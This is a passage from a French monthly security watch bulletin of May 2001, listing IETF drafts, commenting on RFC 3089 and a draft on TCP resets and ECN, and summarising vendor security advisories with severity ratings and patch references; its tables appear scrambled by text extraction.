SILC
SIP
SMI
SMS
SMTP
SNMP
SONET
SPATIAL
SPIRITS
SSPM
STD39
TCP
draft-ietf-seamoby-paging-requirements-01
draft-martin-managesieve-03
draft-hou-sigtran-tua-00
draft-riikonen-silc-commands-00
draft-riikonen-silc-pp-02
draft-ietf-sip-isup-01
draft-ietf-sip-isup-mime-10
draft-ietf-sip-overlap-00
draft-levy-sip-diversion-02
draft-rosenberg-sip-sctp-01
draft-schulzrinne-sip-register-01
draft-steenfeldt-sip-serl-fwr-00
draft-ietf-sming-reqs-01
draft-koponen-sms-xml-01
draft-vaudreuil-1983bis-00
draft-ietf-eos-oidcompression-00
draft-ietf-eos-snmpbulk-00
draft-ietf-eos-snmp-rowops-00
draft-ietf-eos-snmpxproto-mib-00
draft-ietf-snmpconf-bcp-05
draft-ietf-snmpv3-coex-v2-00
draft-malis-sonet-ces-mpls-04
draft-tang-spatial-descriptive-location-00
draft-ietf-spirits-architecture-03
draft-kalbfleisch-sspmmib-02
draft-ymbk-std39-historic-02
draft-floyd-tcp-reset-00
25/04
10/05
15/05
30/04
30/04
21/05
16/05
27/04
18/05
26/04
23/05
08/05
25/04
27/04
10/05
16/05
14/05
27/04
21/05
11/05
18/05
10/05
22/05
30/04
16/05
26/04
24/04
24/04
21/05
07/05
30/04
09/05
01/05
04/05
30/04
11/05
16/05
27/04
27/04
27/04
11/05
16/05
09/05
01/05
25/04
24/04
27/04
18/05
15/05
07/05
21/05
01/05
14/05
27/04
27/04
14/05
26/04
22/05
09/05
21/05
24/04
07/05
17/05
24/04
30/04
26/04
09/05
25/04
25/04
11/05
25/04
27/04
18/05
09/05
17/05
14/05
07/05
IP over Optical Networks: A Summary of Issues
Integrated Services across MPLS domains using CR-LDP signaling
Multicast Source Discovery Protocol (MSDP)
mSLP - Mesh-enhanced Service Location Protocol
NNI Path Protection Control Plane Issues
The application/ogg Media Type
Packet-Optical Escalation Strategies
OSPFv2 Metric Auto-Decay
OSPF Type 5 to Type 7 Translation
RP Relocation Extension to PIM-SM Multicast Routing
Transport Protocols for CMP
Infor. Model for Describing Network Device QoS Mechanisms
Terminology
Gene. PPP Flow Control Mechanism for Packet Over SONET Links
An Architecture for L2VPNs
Printer Finishing MIB
Domain Name and Related Definitions
Generic Registry-Registrar Protocol Requirements
Requirements for Pseudo Wire Emulation Edge-to-Edge (PWE3)
Requirements & framework for ATM network internet. over MPLS
Framework for Pseudo Wire Emulation Edge-to-Edge (PWE3)
Quick Transaction Protocol - QTP
Identity Representation for RSVP
Framework for session set-up with media authorization
RFC1858 is not water-tight
RIP Version 2 MIB Extension
Resource Management in Diffserv (RMD) Framework
Resource Management in Diffserv On DemAnd (RODA) PHR
Requirements & assumptions for ROHC 0-byte IP/UDP/RTP Comp
Link-Layer Assisted ROHC Over CDMA2000
Comparison of Protocols for Reliable Server Pooling
Requirements for Reliable Server Pooling
Capability Negotiation: The RSVP CAP Object
RTP Payload Format for MPEG-4 Streams
RTP Payload Format for Keying-Information Stream (KS)
An RTP Payload Format for EVRC Speech
RTP Payload Fmt & file Storage Fmt for AMR & AMR-WB audio
RTP Interoperability Statement
RTP Testing Strategies
An RTP Payload Fmt for Generic FEC with Uneven Level Protection
SCTP Dynamic Addition of IP addresses
Stream Control Transmission Protocol
SCTP compatible delivery subsystem
SDP: Session Description Protocol
Session Description and Capability Negotiation
Requirements for Session Description and Capability Negotiation
Conventions for the use of the SDP for Digital Circuit Connections
RTCP attribute in SDP
Reasons For Performing Context Transfers Between Nodes in an IP
Dormant Mode Host Alerting ('IP Paging') Problem Statement
Requirements for an IP Mobile Node Alerting Protocol
A Protocol for Remotely Managing Sieve Scripts
SS7 TCAP-User Adaptation Layer (TUA)
SILC Commands
SILC Packet Protocol
ISUP to SIP Mapping
MIME media types for ISUP and QSIG Objects
Mapping of ISUP Overlap Signalling to SIP
Diversion Indication in SIP
SCTP as a Transport for SIP
SIP Registration
SIP Service Execution Rule Language Framework and Requir.
SMIng Requirements
XML encoding for SMS messages
Enhanced Mail System Status Codes
SNMP Object Identifier Compression
Efficient Transfer of Bulk SNMP Data
SNMP Row Operations Extensions
SNMP Extended Protocol MIB
Configuring Networks and Devices with SNMP
Coexistence between V1, V2, V3 of the Internet SNMP Framework
SONET/SDH Circuit Emulation Service Over MPLS Encapsulation
Common Syntax and Coding for Descriptive Location
The SPIRITS Architecture
Def. of MIB for Synthetic Sources for Performance Monitoring alg.
Request to Move STD 39 to Historic Status
Inappropriate TCP Resets Considered Harmful
Page 19/45
Mai 2001
TFRC
TRIP
UMPS
UNIVERS
URN
VPIM
WCIP
WEB
WEBDAV
WIRELES
XCAST
draft-ietf-pilc-2.5g3g-01
draft-ietf-pilc-asym-04
draft-otis-tcp-framing-00
draft-ietf-tsvwg-tfrc-02
draft-ietf-iptel-trip-06
draft-bogdanov-comments-umsp-01
draft-felton-universal-language-01
draft-ietf-urn-rfc2611bis-03
draft-walsh-urn-publicid-01
draft-ietf-vpim-address-01
draft-ietf-vpim-hint-05
draft-ietf-vpim-ivm-goals-02
draft-ietf-vpim-vpimv2r2-02
draft-new-webi-wcip-beep-00
draft-baker-xhtml-media-reg-01
draft-daviel-html-geo-tag-05
draft-daviel-http-geo-header-03
draft-wilson-wrec-wccp-v2-01
draft-ietf-deltav-versioning-15
draft-partain-wireless-issues-00
draft-lee-xcast-ethernet-00
17/05
18/05
25/04
21/05
21/05
30/04
26/04
08/05
08/05
26/04
24/04
03/05
27/04
03/05
30/04
25/04
25/04
26/04
24/04
24/04
09/05
TCP over 2.5G and 3G Wireless Networks
TCP Performance Implications of Network Asymmetry
TCP Framing Header
TCP Friendly Rate Control (TFRC):Protocol Specification
Telephony Routing over IP (TRIP)
Comments to the Unified Memory Space Protocol
Intern. Language Bridge For Implementing Language Free Svcs
URN Namespace Definition Mechanisms
A URN Namespace for Public Identifiers
VPIM Addressing
Message Context for Internet Mail
High-Level Requirements for Internet Voice Mail
Voice Profile for Internet Mail - version 2
The WCIP Profile
The 'application/xhtml+xml' Media Type
Geographic registration of HTML documents
Geographic extensions for HTTP transactions
Web Cache Communication Protocol V2.0
Versioning Extensions to WebDAV
Resource Reservation Issues in Cellular Access Networks
Xcast over Ethernet
Page 20/45
Mai 2001
NOS COMMENTAIRES
LES RFC
RFC 3089
A SOCKS-based IPv6/IPv4 Gateway Mechanism
Ce RFC a pour auteur H.Kitamura de la société NEC, société à l'origine du protocole de relayage sécurisé SOCKS®.
Conçu dans les années 95 en tant que protocole de relayage et
d'accès sécurisé, le protocole SOCKS V4 n'a jamais vraiment
connu le succès escompté car imposant une modification
substantielle - une opération dénommée 'socksification' - des
applications clientes.
En revanche, la Version 5, normalisée par l'IETF et spécifiée par
le biais de trois RFC (RFC1928, RFC1929 et RFC1961), doit être
considérée comme mature et fiable. Elle a donnée lieu à de
nombreuses implémentations notamment dans le domaine des
applications Internet (dont notamment les navigateurs WEB).
L'intérêt du protocole SOCKS V5 réside principalement dans sa
simplicité de mise en œuvre et de configuration. SOCKS V5 est
désormais couramment employé comme mécanisme de relayage
générique et de sécurisation d'applications utilisant un transport
TCP ou UDP.
Le fonctionnement de ce protocole est rappelé sur le synoptique
d'origine NEC présenté ci-contre. Celui-ci fait notamment
apparaître les fonctions spécifiques de la V4 présentées dans le
cadre dessiné en pointillé.
La couche SOCKS installée sur le client dialogue avec le serveur
SOCKS pour établir une connexion authentifiée et sécurisée de
manière totalement transparente pour l'utilisateur. Le serveur
SOCKS établi à son tour une connexion vers l'application en se
comportant comme un client. Les données applicative peuvent
alors être échangées de par et d'autre sous le contrôle du serveur
SOCKS.
Référence: http://www.socks.nec.com/aboutsocks.html
Le RFC3089 décrit une utilisation du protocole SOCKS V5 quelque peu étonnante quoique parfaitement adaptée de
part le positionnement de ce protocol: une passerelle d'interconnexion entre réseaux IP V4 et réseaux IP V6.
La figure ci-contre, extraite du RFC, présente le
Client C
Gateway G
Destination D
positionnement de chacun des éléments mis en œuvre:
+-----------+
(Server)
|Application|
- Un client 'C' utilisant un client applicatif 'socksifié',
+-->+===========+
+-------------+
+-----------+
- Une passerelle 'G' attachée aux deux réseaux par le same -+
|*SOCKS Lib*|
| *Gateway* |
|Application|
API +-->+===========+
+=====---=====+
+-----------+
biais de deux interfaces et des piles protocolaires
| Socket DNS|
| Socket DNS |
| Socket DNS|
associées
+-----------+
+-------------+
+-----------+
- Un serveur 'D' hébergeant l'application utilisée par le
| [ IPv X ] |
|[IPvX]|(IPvY)|
| ( IPv Y ) |
+-----------+
+-------------+
+-----------+
client 'C'.
|Network I/F|
| Network I/F |
|Network I/F|
La résolution 'DNS' nécessaire à l'obtention de l'adresse
+-----+-----+
+---+-----+---+
+-----+-----+
du serveur 'D' par le client 'C' devra systématiquement
|
|
|
|
être déléguée à la passerelle. Un client utilisant IP V4 est
+=============+
+-------------+
socksified
normal
en effet dans l'incapacité de traiter une adresse
connection
connection
exprimée au format IPV6.
(ctrl)+data
data only
A cette fin, une adresse virtuelle correspondant au
Fig. 1 Basic SOCKS-based Gateway Mechanism
serveur 'D' sera réservée dans le plan d'adressage du
Client.
Quatre combinaisons peuvent être gérées dont deux combinaisons correspondent à la simple interconnexion de deux
réseaux similaires:
Type
CLIENT
SERVEUR
Caractéristiques
A
IPv4
IPV4
Simple Interconnexion de réseaux IPV4
B
IPv4
IPV6
Mode passerelle IPV4 -> IPV6
C
IPv6
IPV4
Mode passerelle IPV6 -> IPV4
D
IPv6
IPV6
Simple Interconnexion de réseaux IPV6
Sur le plan de la sécurité, et plus particulièrement de l'authentification et de la confidentialité, ce mécanisme préserve
les services offerts par SOCKS entre le client 'C' et la passerelle 'G', et, éventuellement entre cette dernière et le
serveur 'D'. Aucun mécanisme de bout en bout n'est cependant assuré.
ftp://ftp.isi.edu/in-notes/rfc3089.txt
Page 21/45
Mai 2001
LES DRAFTS
DRAFT-FLOYD-TCP-RESET-00
Inappropriate TCP Resets Considered Harmful
Ce document a été écrit pour mettre en garde contre les risques induits par l'utilisation du paquet TCP RESET pour
interrompre l'établissement d'une connexion. L'auteur rappelle que de nombreux serveurs WEB et dispositifs de
sécurité utilisent de manière inconsidérée ce mécanisme mettant ainsi en danger la capacité d'évolution de
l'infrastructure Internet, et plus particulièrement le standard ECN (Explicit Congestion Notification) décrit dans le
RFC2481.
Au titre d’un principe de précaution, de nombreux dispositifs rejettent en effet toute demande connexion (paquet
SYN) pour laquelle l’un des 6 bits d’un champ TCP réservé est positionné (champ TCP ‘Reserved Field‘). Bien que
l’historique de cette stratégie ne puisse être établi avec certitude, il semble que l’utilitaire Queso y soit pour quelque
chose: destiné à identifier à distance un quelconque équipement par sondage et analyse des réponses, cet utilitaire
signe son passage par positionnement de certains bits du champ réservé.
Les tentatives d’identification par sondage non sollicité pouvant être considérées comme une atteinte à la sécurité
d’un système, un mécanisme préventif a dû rapidement être mis en place par les éditeurs. Ce mécanisme conduit
cependant à rejeter sans plus de précaution certains paquets utilisant de manière tout à fait légitime, et désormais
normalisée, certains bits du dit ‘champ réservé’. C’est ainsi ainsi le cas du protocole ECN qui utilise les deux derniers
bits – 8=CWN (Congestion Window Reduced) et 9= ECN (Echo flag) – dont le rôle exact est précisé dans le RFC2481.
L’ACIRI - centre de recherche financé par AT&T et géré par l’ICSI (International Computer Science Institute) –a
développé TBIT, un utilitaire destiné à analyser le comportement des piles TCP/IP, et en particulier, les réactions de
celles-ci lors de la réception d’un paquet SYN conforme au standard ECN.
Les résultats d’une vaste campagne d’analyse portant sur plus de 10 000 sites WEB (en pratique 24 000 pour les
tests concernant la compatibilité ECN) ont ainsi fait l’objet d’un rapport technique publié en Février 2001 par l’ICSI
sous le titre ‘Identifying the TCP Behavior of Web Servers‘.
Le tableau suivant, extrait de ce rapport, présente les résultats concernant les test de compatibilité ECN :
Résultats
Nombre de serveurs
1
Serveur non compatible ECN
21602
2
Aucune réponse
3
Réponse sous la forme d’un rejet via un paquet RESET
513
4
ECN négocié mais la donnée d’acquittement ne contient pas le drapeau attendu
255
5
ECN négocié, la donnée d’acquittement contient le drapeau attendu (ECN_ECHO)
22
Sur un total de
24030
1638
Le rapport apporte les précisions suivantes concernant l’identité des équipements à l’origine des résultats 2, 3 et 4 :
2 - Majorité de systèmes identifiés comme utilisant AIX,
3 - Plates-formes de type ‘Cisco Cache Director’ (un correctif est désormais disponible),
4 - Majorité de systèmes identifiés comme utilisant un version ancienne de LINUX (noyau < 2.4.x).
Ces résultats sont modulés par le faible nombre d’équipements et de systèmes supportant ECN, en dehors toutefois
de la dernière version du noyau LINUX. Notons qu’en présence d’un équipement rejetant les connexions contenant
les drapeaux ECN, un client ayant le mécanisme ECN activé ne verra plus les sites WEB qu’il voyait auparavant. Ce
dysfonctionnement est ainsi constaté depuis quelques temps par les utilisateurs des dernières versions de LINUX.
ftp://ftp.nordu.net/internet-drafts/draft-floyd-tcp-reset-00.txt
Page 22/45
Mai 2001
ALLEER
TT
TA
RT
AQ
TE
QU
ES
UE
SE
ES
S
ET
T AT
ALERTES
GUIDE DE LECTURE
La lecture des avis publiés par les différents organismes de surveillance ou par les constructeurs n’est pas
toujours aisée. En effet, les informations publiées peuvent être non seulement redondantes mais aussi
transmises avec un retard conséquent par certains organismes. Dès lors, deux alternatives de mise en
forme de ces informations peuvent être envisagées :
# Publier une synthèse des avis transmis durant la période de veille, en classant ceux-ci en fonction de
l’origine de l’avis,
# Publier une synthèse des avis transmis en classant ceux-ci en fonction des cibles.
La seconde alternative, pour séduisante quelle soit, ne peut être raisonnablement mise en œuvre étant
donné l’actuelle diversité des systèmes impactés. En conséquence, nous nous proposons de maintenir une
synthèse des avis classée par organisme émetteur de l’avis.
Afin de faciliter la lecture de ceux-ci, nous proposons un guide de lecture sous la forme d'un synoptique
résumant les caractéristiques de chacun des sources d’information ainsi que les relations existant entre ces
sources. Seules les organismes, constructeurs ou éditeurs, disposant d’un service de notification officiel et
publiquement accessible sont représentés.
Avis Spécifiques
Constructeurs
Réseaux
3Com
Cisco
Systèmes
Avis Généraux
Editeurs
Systèmes
Compaq
Indépendants
Editeurs
Linux
Hackers
Microsoft
HP
FreeBSD
IBM
NetBSD
SGI
OpenBSD
SUN
SCO
l0pht
Netscape
rootshell
Editeurs
Organismes
Autres
US
Autres
Aus-CERT
AXENT
BugTraq
CERT
ISS
@Stake
CIAC
Typologies des informations publiées
Publication de techniques et de programmes d’attaques
Détails des alertes, techniques et programmes
Synthèses générales, pointeurs sur les sites spécifiques
Notifications détaillées et correctifs techniques
L’analyse des avis peut être ainsi menée selon les trois stratégies suivantes :
# Recherche d’informations générales et de tendances :
Lecture des avis du CERT et du CIAC
# Maintenance des systèmes :
Lecture des avis constructeurs associés
# Compréhension et anticipation des menaces :
Lecture des avis des groupes indépendants
Aus-CERT
CERT
3Com
Compaq
Microsoft
BugTraq
rootshell
AXENT
NetBSD
Cisco
HP
Netscape
@Stake
l0pht
ISS
OpenBSD
IBM
Xfree86
SGI
Linux
SUN
FreeBSD
CIAC
Page 23/45
Mai 2001
FORMAT DE LA PRESENTATION
Les alertes et informations sont présentées classées par sources puis par niveau de gravité sous la forme
de tableaux récapitulatifs constitués comme suit:
%
Présentation des Alertes
EDITEUR
TITRE
Description sommaire
Gravité
Date Informations concernant la plate-forme impactée
Produit visé par la vulnérabilité Description rapide de la source du problème
Correction
URL pointant sur la source la plus pertinente
Référence
%
Présentation des Informations
SOURCE
TITRE
Description sommaire
URL pointant sur la source d'information
SYNTHESE MENSUELLE
Le tableau suivant propose un récapitulatif du nombre d’avis publiés pour la période courante, l’année en
cours et l’année précédente. Ces informations sont mises à jour à la fin de chaque période de veille.
L’attention du lecteur est attirée sur le fait que certains avis sont repris et rediffusés par les différents
organismes. Ces chiffres ne sont donc représentatifs qu’en terme de tendance et d’évolution.
Période du 21/04/2001 au 23/05/2001
Période
Organisme
20
CERT-CA
4
CERT-IN
2
CIAC
14
Constructeurs
8
Cisco
4
HP
2
IBM
0
SGI
1
Sun
1
Editeurs
13
Allaire
6
Microsoft
7
Netscape
0
Sco
0
Unix libres
40
Linux RedHat
13
Linux Debian
9
Linux Mandr.
12
FreeBSD
6
Autres
4
@Stake
1
Safer
0
X-Force
3
Cumul
2001 2000
79
118
12
22
5
10
62
86
43
77
13
13
18
28
7
17
2
12
3
7
41
155
8
32
29
100
2
7
2
16
181
226
40
137
51
66
52
-38
23
25
38
13
10
5
1
7
27
Cumul 2001 - Constructeurs
SGI
5%
IBM
16%
Cumul 2000 - Constructeurs
Sun
7%
Sun
9%
SGI
16%
Cisco
17%
Cisco
30%
IBM
22%
HP
36%
HP
42%
Netscape Cumul 2001 - Editeurs
Sco
5%
5%
Microsoft
70%
Cumul 2000 - Editeurs
Allaire
20%
Netscape
5%
Sco
10%
Allaire
21%
Microsoft
64%
Page 24/45
Mai 2001
Alertes détaillées
AVIS OFFICIELS
Les tables suivantes présentent une synthèse des principales alertes de sécurité émises par un organisme
fiable, par l’éditeur du produit ou par le constructeur de l’équipement. Ces informations peuvent être
considérées comme fiables et authentifiées. En conséquence, les correctifs proposés, s'il y en a, doivent
immédiatement être appliqués.
BUGZILLA
Vulnérabilité dans le script CGI 'bugzilla'
Une vulnérabilité dans les scripts CGI de 'bugzilla' permet de faire exécuter du code sur le serveur.
Forte
30/04 Bugzilla (version 2.10) sur toute plate-forme supportantles scripts perl CGI et MySQL.
Non vérification des paramètres passés en entrée
Correctif existant Script CGI
http://www.atstake.com/research/advisories/2001/index_q2.html#043001-1
[a043001-1]
CERT
Apparition et propagation du ver 'sadmind/IIS'
Un ver dénommé 'sadmind/IIS' fait son apparition sur l'Internet. Il semble utiliser deux vulnérabilités connues afin
de se propager en environnements Solaris et Microsoft IIS.
Critique 08/05 Serveurs SOLARIS (version <= 2.7) non patchés et Serveurs Microsoft IIS 4.0 et 5.0 non patchés
Utilisation des vulnérabilités présentes dans les services énoncés
Correctif existant Services 'sadmind' et 'IIS'
http://www.cert.org/advisories/CA-2001-11.html
CERT CA
Faiblesse d'initialisation des numéros de séquence TCP
Le CERT publie, sous la référence CA-2001-09, une alerte au sujet des faiblesses dans la méthode d'initialisation
des numéros de séquences des paquets TCP/IP.
Forte
01/05 Systèmes dont lJe fonctionnement de la pile TCP n'est pasconforme à la RFC 1948 (ou implémentations
Correctif existant
Michal Zalewski
CA-2001-09
FA-2001-09
équivalentes). Systèmes n'implémentant pas de protocole de communication sécurisé tels qu'IPSec
Numéros de séquence TCP/IP
Prédiction des ISN (Initial Sequence Numbers)
http://razor.bindview.com/publish/papers/tcpseq.html
http://www2.fedcirc.gov/advisories/FA-2001-09.html
Informations au sujet du ver 'cheese'
Le CERT publie dans une note d'information référencée IN-2001-05 un descriptif du ver baptisé 'cheese'.
Forte
17/05 Toute plateforme Linux déjà affectée par le ver 'lion'
Exploitation d'une porte dérobée
Correctif existant Virus 'cheese' (type ver)
http://www.cert.org/incident_notes/IN-2001-05.html
IN-2001-05
CIAC
Nouvelle porte dérobée 'Glacier'
Le CIAC publie, sous la référence L-077, un bulletin d'alerte au sujet d'un nouvel outil d'instrusion 'Glacier', similaire
à 'Back Orifice', permettant de prendre à distance le contrôle d'une machine.
Critique 30/04 Microsoft Windows NT, NT Server, 95, 98, Me et 2000
Présence d'une porte dérobée
Correctif existant Cheval de Troie 'G_server.exe'
http://ciac.llnl.gov/ciac/bulletins/l-077.shtml
L-077
CISCO
Multiples vulnérabilités dans 'CBOS'
CBOS, le système d'exploitation de la famille des routeurs Cisco 600 contient de multiples vulnérabilités.
Critique 23/05 CBOS versions 2.0.1, 2.1.0, 2.1.0a, 2.2.0, 2.2.1, 2.2.1a,2.3, 2.3.2, 2.3.5, 2.3.7 et 2.3.8 sur Cisco 627, 633,
Correctif existant
CSCds
16078,30150,
04882, 74567
673, 675, 675E, 677, 677i et 678
1 - Prédiction des ISN
1 – Numéros de séquence TCP
2 - Mauvaise gestion du paquet ICMP
2 - Option 'IP Record Route'
3 - Mots de passe 'exec' 'enable' 3 - Stockage en clair des mots de passe
4 - Requête 'ICMP ECHO REPLY' 4 - Mauvaise gestion du paquet ICMP
http://www.cisco.com/warp/public/707/CBOS-multiple2-pub.html
Déni de service potentiel induit par BGP4
Un déni de service sur un équipement utilisant BGP4 peut être provoqué à distance en utilisant un attribut
spécifique de BGP4
Forte
10/05 Configurations BGP4 avec un IOS de la série 11.CC et dérivés, 11.2 et dérivés, 11.3, 11.3T, 12.0, 12.0S.
Gestion d'un attribut NLRI
Correctif existant BGP4
http://www.cisco.com/warp/public/707/ios-bgp-attr-corruption-pub.shtml
CSCdt79947
Page 25/45
Mai 2001
Déni de service dans 'Cisco IOS'
Un conflit d'accès dans 'Cisco IOS' peut provoquer (en deux temps) un déni de service sur la majorité des systèmes
basés sur cet environnement.
Forte
24/05 Cisco IOS versions 12.1(2)T et 12.1(3)T(problème introduit avec la version 12.1(1.3)T)
Corruption de la mémoire
Correctif existant Conflit d'accès
http://www.cisco.com/warp/public/707/ios-tcp-scanner-reload-pub.shtml
CSCds 07326
Mauvaises permissions sur les commutateurs CSS 11000
L'accès FTP aux commutateurs Cisco CSS (Arrowpoint) série 11000 n'assure pas les bonnes permissions pour les
utilisateurs non privilégiés.
Moyenne 18/05 Cisco CSS série 11000 (11050, 11150 et 11800) avec Cisco WebNS inférieurs à 4.01B23s et 4.10B13s
Cisco WebNS
Mauvaises permissions d'accès FTP
Palliatif proposé
http://www.cisco.com/warp/public/707/arrowpoint-ftp-pub.shtml
CSCdt64682
FreeBSD
Débordement de buffer dans 'slrn'
Le paquetage 'slrn', permettant de lire les messages recueillis sur un serveur de news, est vulnérable à un
débordement de buffer.
Forte
23/04 FreeBSD 3.5.1 et 4.2, paquetage 'slrn-0.9.7.0'
Débordement de buffer
Correctif existant Analyse syntaxique
http://www.freebsd.org/security/security.html#adv
SA-01:37
HP
Droits d'accès incorrects sur 'pcltotiff'
Les droits d'accès positionnés par défaut sur l'utilitaire 'pcltotiff' peuvent être exploités pour provoquer un déni de
service local.
Forte
19/04 HP-UX versions 10.01, 10.10, 10.20 et 10.26 sur HP9000séries 700 et 800
Correctif existant Utilitaire de conversion 'pcltotiff' SGID 'bin' positionné
HPSBUX0104-149 http://europe-support.external.hp.com/
Vulnérabilités dans l'environnement 'CDE' sur HP-UX
Plusieurs vulnérabilités dans les modules 'CDE' peuvent mener un utilisateur à provoquer un déni de service ou
acquérir des privilèges sur les systèmes HP-UX.
Forte
22/05 HP-UX versions 10.10, 10.20, 10.24, 11.00, 11.04 et 11.11sur HP9000 séries 700 et 800
Correctif existant Modules 'CDE'
HPSBUX0105-151 http://europe-support2.external.hp.com/
INNFeed
Débordement de buffer dans l'utilitaire 'startinnfeed'
Un débordement de buffer peut être exploité pour acquérir localement les privilèges de l'utilisateur 'news'
Forte
18/04 INNFeed versions < 2.3.1 en environnement LINUX Slackware <= 7.1 , Mandrake <= 7.0, RedHat <= 7.1
Correctif existant Utilitaire 'startinnfeed'
http://www.securiteam.com/unixfocus/INNFeed_buffer_overflow__-c_parameter_.html
Securiteam
IPSWITCH
Débordement de buffer dans le service SMTP IMail 6.06
Un débordement de buffer présent dans le service SMTP du produit IMail 6.06 autorise l'exécution distante de
commandes sur le serveur
Critique 24/04 Confirmé sur IMail 6.06 et probable sur les versions antérieures
Contrôle des données
Correctif existant Service SMTP
http://www.eeye.com/html/Research/Advisories/AD20010424.html
AD20010424
Page 26/45
Mai 2001
KERBEROS
Débordements de buffer dans le service 'ftp'
Deux débordements de buffer présents dans le service 'ftp' permettent d'obtenir un accès distant privilégié.
Critique 25/04 MIT Kerberos 5 toutes versions
Débordement de buffer multiples
Correctif existant Démon 'ftpd'
http://web.mit.edu/kerberos/www/advisories/ftpbuf.txt
MIT
LINUX
Vulnérabilité dans 'gftp'
Une vulnérabilité de type formatage de chaînes de caractère affecte localement le paquetage 'gftp'.
Forte
27/04 'gftp' versions inférieures à la 2.0.8Linux Mandrake 7.1, 7.2, 8.0 et Corporate Server 1.0.1Linux Immunix
Correctif existant
MDKSA-2001:044
2001-70-017-01
6.2, 7.0-beta et 7.0
Fonction 'printf()'
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-044.php3
http://www.linuxsecurity.com/advisories/other_advisory-1326.html
LINUX DEBIAN
Vulnérabilité dans le paquetage 'man-db'
L'exploitation locale d'une vulnérabilité de type lien symbolique présente dans l'utilitaire 'mandb' autorise
l'écrasement d'un quelconque fichier.
Moyenne 08/05 Debian GNU/Linux 2.2 (toutes architectures)
Création non sécurisée de fichiers temporaires
Correctif existant 'mandb' - options '-c' et '-u'
http://lists.debian.org/debian-security-announce-01/msg00058.html
DSA-056-1
LINUX MANDRAKE
Vulnérabilité dans 'rpmdrake'
Une vulnérabilité de type lien symbolique affecte localement le paquetage 'rpmdrake'.
Moyenne 27/04 Linux Mandrake 8.0
Création non sécurisée de fichiers temporaires
Correctif existant Lien symbolique
MDKSA-2001:043 http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-043.php3
LINUX REDHAT
Vulnérabilité dans le paquetage 'mount'
De mauvaises permissions du fichier d'échange permet à un utilisateur local de lire le contenu de celui-ci.
Forte
02/05 Linux Red Hat 7.1 (i386)
Mauvaises permissions du fichier d'échange (swap file)
Correctif existant Paquetage 'mount'
http://www.redhat.com/support/errata/RHSA-2001-058.html
2001:058-04
Vulnérabilités dans le paquetage 'kdelibs'
Une vulnérabilité de type lien symbolique affecte localement le paquetage 'kdelibs'.
Moyenne 30/04 Red Hat Linux 7.1 (i386)
Création dangereuse de fichiers temporaires
Correctif existant Paquetage 'kdelibs'
http://www.linuxsecurity.com/advisories/redhat_advisory-1335.html
2001:059-03
Mauvaise méthode journalisation dans 'mgetty'
Une erreur dans la fonction de journalisation de 'mgetty' ne permet pas la rotation des journaux. Ces derniers
peuvent donc être écrasés.
Faible
19/04 Red Hat Linux 5.2, 6.2, 7.0, 7.1
Mauvaise méthode journalisation
Correctif existant Script 'faxspool'
http://www.redhat.com/support/errata/RHSA-2001-050.html
2001:050-04
LINUX SUSE
Vulnérabilité dans 'nedit'
Un problème de gestion des fichiers temporaires par l'éditeur 'nedit' peut conduire à l'acquisition locale des
privilèges de 'root'
Forte
19/04 Linux SuSE [6.1, 6.2] 6.3, 6.4, 7.0 et 7.1 et tout autre système utilisant 'nedit'
Fichiers temporaires non sûrs
Correctif existant Editeur 'nedit'
SuSE-SA:2001:14 http://www.linuxsecurity.com/advisories/suse_advisory-1304.html
Vulnérabilité dans 'hylafax'
Une erreur de conception dans le service de gestion des fax 'hfaxd' peut conduire à l'acquisition locale des privilèges
'root'.
Forte
20/04 Linux SuSE [6.1, 6.2] 6.3, 6.4, 7.0 et 7.1 et tout système utilisant le service 'hfaxd'
Utilisation non sure de la fonction 'syslog'
Correctif existant Démon 'hfaxd'
SuSE-SA:2001:15 http://www.linuxsecurity.com/advisories/suse_advisory-1311.html
Page 27/45
Mai 2001
MICROSOFT
Détournement des services dans 'Windows 2000'
L'utilisation commune des registres de déboguage peut permettre de détourner un processus afin de se faire passer
pour lui.
Critique 24/05 Microsoft Windows 2000 (SP1)
Registres communs à tous les processus et services
Correctif existant Registres de déboguage
http://www.guninski.com/dr07.html
Guninski #45
Débordement dans l'extension ISAPI sous IIS 5.0
Un débordement de buffer affecte Windows 2000 et IIS 5.0, permettant, à distance, d'exécuter du code sur la
machine cible.
Critique 01/05 Microsoft Windows 2000 Server, Advanced Server et Datacenter Server avec IIS 5.0
Correctif existant Filtre '.printer' ISAPI
MS01-023
AD20010501
Trois vulnérabilités dans IIS 4.0 et 5.0
Microsoft publie un correctif cumulatif traitant trois vulnérabilités dans IIS 4.0 et 5.0. De plus, il corrige plusieurs
erreurs présentes dans des correctifs antérieurs.
Critique 14/05 Microsoft IIS 4.0 et 5.0
1 – Contournement des vérifications des requêtes
Correctif existant 1 - Décodage de requêtes
MS01-026
2 - Mauvaise gestion des requêtes
2 - Globalisation requêtes FTP
3 - Autorisation de connexion FTP
3 - Recherche des domaines
Plusieurs vulnérabilités dans Internet Explorer
Plusieurs vulnérabilités dans le contrôle des certificats affectent le navigateur Internet Explorer. Une exploitation à
distance peut entraîner la compromission du système.
Critique 16/05 Microsoft Internet Explorer 5.01 et 5.5
1 - Désactivation de certains contrôles
Correctif existant 1 - Vérification des CRLs
MS01-027
2 - Modification du contenu de la barre d'adresse
2 - Affichage de l'adresse site
3 - Mauvaise vérification de la zone de confiance
3 - Frames
Exécution de macros 'Word' via les documents RTF
Une vulnérabilité dans le processus de vérification de la présence de macros dans les documents RTF peut
permettre à un utilisateur d'exécuter du code sur la machine distante via les macros Word.
Critique 22/05 Microsoft Word 97 et 2000, 98 (version Japonaise) et Microsoft Word 98 et 2001 pour Mac
Correctif existant Document RTF liés à un modèle Présence de macros dans le fichier
MS01-028
Débordement de buffer dans 'Windows Media Player'
Un débordement de buffer affecte à distance 'Windows Media Player' dans le traitement des fichiers '.ASX'.
Critique 23/05 Microsoft Windows Media Player 6.4 et 7
Correctif existant 1 - Analyseur syntaxique '.ASX' 1 - Débordement de buffer
MS01-029
2 - Raccourcis Internet
2 - Création non sécurisée des raccourcis
Multiples vulnérabilités dans le service d'indexation
Deux vulnérabilités, exploitables à distance, liées au service d'indexation, autorisent l'une, l'exécution de
commandes non sollicitées sur le serveur et l'autre, l'acquisition d'un quelconque fichier.
Critique 10/05 NT 4.0 - Index Server 2.0 et W2K - Service d'indexation W2K
1- Débordement de buffer
Correctif existant 1- Index Server 2.0
MS01-025
2- Index Server 2.0 et W2K
2- Fonction WebHits (Hit-Highlighting)
http://www.microsoft.com/technet/security/bulletin/MS01-025.asp.
Déni de service dans IIS 5.0 via une requête 'WebDav'
L'extension 'WebDav' fournit certaines commandes dont une peut mener un utilisateur distant à provoquer un déni
